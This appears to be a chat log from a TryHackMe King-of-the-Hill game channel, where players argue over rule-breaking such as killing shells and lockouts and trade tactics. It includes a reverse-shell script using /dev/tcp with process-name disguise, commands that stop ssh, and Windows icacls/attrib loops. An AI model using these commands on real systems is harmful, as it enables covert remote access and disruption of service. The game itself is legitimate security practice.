[BIN: /sbin/systemctl] systemctl stop ssh.service
[BIN: /bin/systemctl] systemctl stop ssh.service
[BIN: /bin/sh] sh /bin/systemctl stop ssh.service
@mystic oxide you should not talk about rules first blame your self ๐คฃ
??? lol I'm not even here
we knows you very well bro what u did yesterday & see i didnt break any rule u checking ur own history log sounds so cringe
lol i have proof after this you use mount trick from @steep agate repo ๐คฃ
that have your name in ๐
๐ ๐
tryhackme rule number 1: The machine must not be made unavailable (shutdown/restart, firewall/iptables rules to stop all communication)

New here. What can I do?
Hi, if you want you can participate in THM's KOTH here: https://tryhackme.com/games/koth
What's the trouble here ๐
Cant koth cant do thm rooms have a job maybe later lol
https://tryhackme.com/r/p/ThisizAmen this user is breaking rule
Please contact support
15 min in the game and he reset like 8 times
In koth people reset for no reason ๐คฃ
There will be a game in 20 minutes, join us! It's going to be fun!
goodluck, fellows!
@fair adder nice game buddy
Thx bro
gg
@fossil helm nice game Offline
on the other hand on Production, your loop with chattr breaks the shell, so we can't do anything anymore
@fossil helm ha and you also deleted the entry for sh and bash, ha yes there it is sure that we can no longer do anything, it's a shame
didnt do anything aside from defending king
ah yes it is sure that he is well defended lol
we can no longer access the box
someone just patched after killing shells lol
in any case it seems to me that this is the very first time that I manage to finish a KOTH in front of you, but hey it was a windows box. In any case nice game
nice game on offline
but I still have to learn a lot under Linux, I'm not very good at the king under Linux, when you're there, well yes it's dead to win LOL
I asked you a question in PM, when you have 5 minutes to watch, thank you
Gave +1 Rep to @fossil helm (current: #1030 - 4)
damn since when did koth get so tense lmao
lol @fossil helm why all delete : [] Opening SVCManager on 10.10.146.61.....
[] Stopping service gqKx.....
[] Removing service gqKx.....
[] Removing file vOqiSOXH.exe.....
not cool even the 2 boxes before this one, you delete all access to the box, luckily we were able to reset the box so that @leaden basin passes in front of you because otherwise no one can play anymore.
?
lol like???
what? lol
food?
didnt even play after getting king lol
you guys just reset and i didnt care lol
why on Linux VMs do you cut all access to the box, so it's unplayable
not me
someone just killed shell ik who did it lol
yes normal there is only that to do, you block everything
you block? me? lol
lol you said the same thing the other day
but it's not necessarily against you, but it's a shame that you play like that, you block all access to the box
idiot not me
ask it to niko lmfao
before you reset the box nikko got the king from me
you blind?
he kicked you all ol
lol
sometimes use the logic why you went into that thm rank bro kol
lol
yes yes if we had not reset the box, we could not do anything, so yes with @leaden basin we reset the box.
i already told you still you didnt understand

i didnt play in 3 resets
I'm just asking you why you block all access to the box once you enter it? It's just a question
@fossil helm lol fix your lkm breaking the machine blameing other is easy
read what he said
he accuse me
i dint even play
lmfao
after i been kicked in the machine
Lol then does't mean you will accuse other lol
i told him to ask you
since he was accusing me lmfao
its like he accuse anshul a while back
but he doesnt know what he is accusing

we just see that when you play, 10 seconds later the box becomes inaccessible that's all
block services and change all passwords, I'm just saying it's not very cool that's all
you cannot access because someone killed the shell
he didnt change passs
lmfao
anyways its hard to explain to you dont know that
i am also the victim of that killing shell a while ago so i didnt play after that
@mystic oxide next time be careful mentioning someone here lmfao
?
if you dont know what are you talking lmfao
lmfao ?
someone just loop the killing shell
lmfao
he cried
he said "block all access"
no need because shell already killed in loop 
read -p "Enter the name of the process you want: " procname
read -p "Enter your IP: " ip
read -p "Enter your PORT: " port
#rev
/usr/bin/setsid /bin/bash -c "exec -a '$procname' /bin/bash &>/dev/tcp/$ip/$port 0>&1 &"
echo "revshell was run with your process name."```
try using a different process name
and so someone who doesn't know anything about Linux won't be able to kill your pid
I can escape with that loop also
good tip
but i didnt put persistent and killed it by myself bc it would be useless also if someone will just kill the process
@mystic oxide hows the windows machine
i am asking in a nice way
what question?
Windows is cool, you can play a lot with ACL/Attributes of a file in koth, you can also make a ring3 rootkit for Windows
It would be nice to have an AD machine with ADCS (Certificate Services), can be predicted many people abusing certificates for persistence
can you bypass?
bypass what?
the h1medium
most people who play windows machines in koth (that's when I played, I stopped playing last year), just used loops with attrib and icacls
what is easy to bypass
most of players just using your windows tip in github
serious? interesting
i have my own in h1medium but in offline im trying to figure it out
I thought no one would see my repo anymore
ha I don't know, I'm not on it anymore, I'm here to chat with you
you tried ik that
yes yes, thanks to you I learned a lot of things, did a lot of tests on personal VMs
Gave +1 Rep to @steep agate (current: #112 - 68)
Oh nice!
and I still have a lot to learn, but a little bit every day, slowly but surely lol
yeah
you will not be on it anymore because i locked it same as what you did xD
no I just tried to invoke my king that's all, but yes I had no rights
attrib +r and icasls I think
*icacls
i can unlock it but yeah its ok to be in that way 1min king lol
yes lol i have the same problem with icacls
just with attrib, no problem for the king
:loop
icacls "king.txt" /grant:r *S-1-1-0:F & attrib -r -s -h "king.txt"
goto loop
problem solved
I'm not in the box anymore
you are a boss, thank you
Gave +1 Rep to @steep agate (current: #111 - 69)
i returned the pass into the default
for block write in king.txt in all users
the only problem is that this will literally lock king.txt, and therefore you will not earn points every 1 minute
yeah
I use this command myself
icacls "C:\Users\Administrator\king-server\king.txt" /deny everyone:(W,D)
you spammed it yesterday
btw, it's worth mentioning that running loops like this can slow down the machine, just as running loops in bash on Linux can also slow down the machine a little.
but I don't think there's anything that could harm other players, it's just something to know
no because I have no point with it, yesterday on windows, I simply deleted your king and uploaded mine on top
try it in h1medium now
directly from the meterpreter
i can patch the smbserver config
so no one can exploit the offline using msfconsole
ok nice
but i just let you in
ok thanks
anyways this is good room in offsec pent @mystic oxide

nothing bro